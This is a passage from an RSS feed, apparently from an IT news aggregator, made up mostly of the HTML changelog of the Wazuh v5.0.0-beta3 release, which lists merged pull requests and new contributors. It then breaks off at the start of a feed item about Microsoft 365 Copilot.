<li>Set default indexer connector credentials by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746445718" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37192" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37192/hovercard" href="https://github.com/wazuh/wazuh/pull/37192">#37192</a></li>
<li>Fix incorrect snprintf size calculation in winevtchannel decoder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750564321" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37198" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37198/hovercard" href="https://github.com/wazuh/wazuh/pull/37198">#37198</a></li>
<li>Align VD feed-download log levels with indexer consumer state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750803257" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37199" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37199/hovercard" href="https://github.com/wazuh/wazuh/pull/37199">#37199</a></li>
<li>Recognize renamed indexer consumer status in engine sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4751474129" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37204/hovercard" href="https://github.com/wazuh/wazuh/pull/37204">#37204</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752903836" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37210" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37210/hovercard" href="https://github.com/wazuh/wazuh/pull/37210">#37210</a></li>
<li>Token replacement to avoid permission errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753550212" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37237" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37237/hovercard" href="https://github.com/wazuh/wazuh/pull/37237">#37237</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752941791" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37211" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37211/hovercard" href="https://github.com/wazuh/wazuh/pull/37211">#37211</a></li>
<li>Eliminate TOCTOU races in healthcheck file operations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736827470" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37160" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37160/hovercard" href="https://github.com/wazuh/wazuh/pull/37160">#37160</a></li>
<li>Sca file policy block standardization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Johnng007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Johnng007">@Johnng007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743999327" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37179" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37179/hovercard" href="https://github.com/wazuh/wazuh/pull/37179">#37179</a></li>
<li>Bind agent index selection and scope deletes by cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735319890" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37154/hovercard" href="https://github.com/wazuh/wazuh/pull/37154">#37154</a></li>
<li>Add Null Check for Inode and Dev Fields in FIM Whodata Event Handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4766388009" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37245" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37245/hovercard" href="https://github.com/wazuh/wazuh/pull/37245">#37245</a></li>
<li>Docs/6764 logcollector whats new 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721987109" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37056" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37056/hovercard" href="https://github.com/wazuh/wazuh/pull/37056">#37056</a></li>
<li>Repair RPM builder toolchain downloads by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728182443" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37130" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37130/hovercard" href="https://github.com/wazuh/wazuh/pull/37130">#37130</a></li>
<li>Add cluster name validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753677014" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37238" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37238/hovercard" href="https://github.com/wazuh/wazuh/pull/37238">#37238</a></li>
<li>Add cluster readiness endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728071822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37129/hovercard" href="https://github.com/wazuh/wazuh/pull/37129">#37129</a></li>
<li>Defer cluster payload buffer allocation until data is received by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769731908" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37280" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37280/hovercard" href="https://github.com/wazuh/wazuh/pull/37280">#37280</a></li>
<li>Indexer connector bulk size and flush interval configurable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736764012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37158" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37158/hovercard" href="https://github.com/wazuh/wazuh/pull/37158">#37158</a></li>
<li>Enable shared-password enrollment by default by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734529271" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37151" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37151/hovercard" href="https://github.com/wazuh/wazuh/pull/37151">#37151</a></li>
<li>Fix unit test workflow paths and report handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777938328" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37317" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37317/hovercard" href="https://github.com/wazuh/wazuh/pull/37317">#37317</a></li>
<li>Migrate agent + server CI artifacts to S3 — 4.14.7 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745105538" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37186" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37186/hovercard" href="https://github.com/wazuh/wazuh/pull/37186">#37186</a></li>
<li>Handle eol amazon inspector classic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746717311" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37194" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37194/hovercard" href="https://github.com/wazuh/wazuh/pull/37194">#37194</a></li>
<li>Fix wazuh-modulesd missing after macOS agent restart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695257310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37020" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37020/hovercard" href="https://github.com/wazuh/wazuh/pull/37020">#37020</a></li>
<li>Fix test_worker failing unit test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777598945" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37314" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37314/hovercard" href="https://github.com/wazuh/wazuh/pull/37314">#37314</a></li>
<li>Improve log messages  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671655779" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36876" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36876/hovercard" href="https://github.com/wazuh/wazuh/pull/36876">#36876</a></li>
<li>Improve changelog format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784576201" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37332/hovercard" href="https://github.com/wazuh/wazuh/pull/37332">#37332</a></li>
<li>Lower log level of transient cluster IPC failures (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768765565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37277" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37277/hovercard" href="https://github.com/wazuh/wazuh/issues/37277">#37277</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768737167" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37276" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37276/hovercard" href="https://github.com/wazuh/wazuh/issues/37276">#37276</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783970019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37326" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37326/hovercard" href="https://github.com/wazuh/wazuh/pull/37326">#37326</a></li>
<li>Fix TypeError when sorting agents by version with empty version strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4779868587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37323" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37323/hovercard" href="https://github.com/wazuh/wazuh/pull/37323">#37323</a></li>
<li>Migrate agent + server CI artifacts to S3 — 5.0.0 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744978467" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37185" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37185/hovercard" href="https://github.com/wazuh/wazuh/pull/37185">#37185</a></li>
<li>Validate asset resource names before policy promotion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741678194" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37172" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37172/hovercard" href="https://github.com/wazuh/wazuh/pull/37172">#37172</a></li>
<li>Revert wazuh-server indexer credentials and propagate log context in indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784669937" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37333" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37333/hovercard" href="https://github.com/wazuh/wazuh/pull/37333">#37333</a></li>
<li>Add VD readiness status HTTP endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753007421" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37213" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37213/hovercard" href="https://github.com/wazuh/wazuh/pull/37213">#37213</a></li>
<li>Use github.workspace for wodles report paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787326775" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37342/hovercard" href="https://github.com/wazuh/wazuh/pull/37342">#37342</a></li>
<li>Skip FIM whodata cases on the tier-2 Linux job (CodeBuild) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4771331061" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37291" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37291/hovercard" href="https://github.com/wazuh/wazuh/pull/37291">#37291</a></li>
<li>Migrate 4.x Windows test runners to AWS CodeBuild  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746542396" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37193" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37193/hovercard" href="https://github.com/wazuh/wazuh/pull/37193">#37193</a></li>
<li>Lower log level of transient queue send failures in modulesd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788115193" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37345" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37345/hovercard" href="https://github.com/wazuh/wazuh/pull/37345">#37345</a></li>
<li>Add changelog check workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787529876" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37343" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37343/hovercard" href="https://github.com/wazuh/wazuh/pull/37343">#37343</a></li>
<li>Add changelog check workflow for 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788939423" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37351" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37351/hovercard" href="https://github.com/wazuh/wazuh/pull/37351">#37351</a></li>
<li>Retry <code>OS_SendUnix</code> on <code>ENOBUFS</code> to stop dropping binary sync messages on macOS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788850753" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37349" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37349/hovercard" href="https://github.com/wazuh/wazuh/pull/37349">#37349</a></li>
<li>change: Allow null root_decoder as alias of empty string on policy cr… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788261828" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37347" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37347/hovercard" href="https://github.com/wazuh/wazuh/pull/37347">#37347</a></li>
<li>Fix eBPF FIM whodata for Amazon Linux by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692775155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37014" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37014/hovercard" href="https://github.com/wazuh/wazuh/pull/37014">#37014</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4792934428" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37358" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37358/hovercard" href="https://github.com/wazuh/wazuh/pull/37358">#37358</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794415837" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37371" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37371/hovercard" href="https://github.com/wazuh/wazuh/pull/37371">#37371</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793306985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37360" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37360/hovercard" href="https://github.com/wazuh/wazuh/pull/37360">#37360</a></li>
<li>Migrate remaining CI artifacts to S3 for the 5.0.0 branch (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="454578666" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/3502" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/3502/hovercard" href="https://github.com/wazuh/wazuh/pull/3502">#3502</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788864035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37350" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37350/hovercard" href="https://github.com/wazuh/wazuh/pull/37350">#37350</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/wazuh/wazuh/compare/v5.0.0-beta2...v5.0.0-beta3"><tt>v5.0.0-beta2...v5.0.0-beta3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft 365 Copilot: Office meets genAI and agents]]></title>
<description><![CDATA[Initially launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid a...]]></description>
<link>https://tsecurity.de/de/3640909/it-nachrichten/microsoft-365-copilot-office-meets-genai-and-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640909/it-nachrichten/microsoft-365-copilot-office-meets-genai-and-agents/</guid>
<pubDate>Thu, 02 Jul 2026 13:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
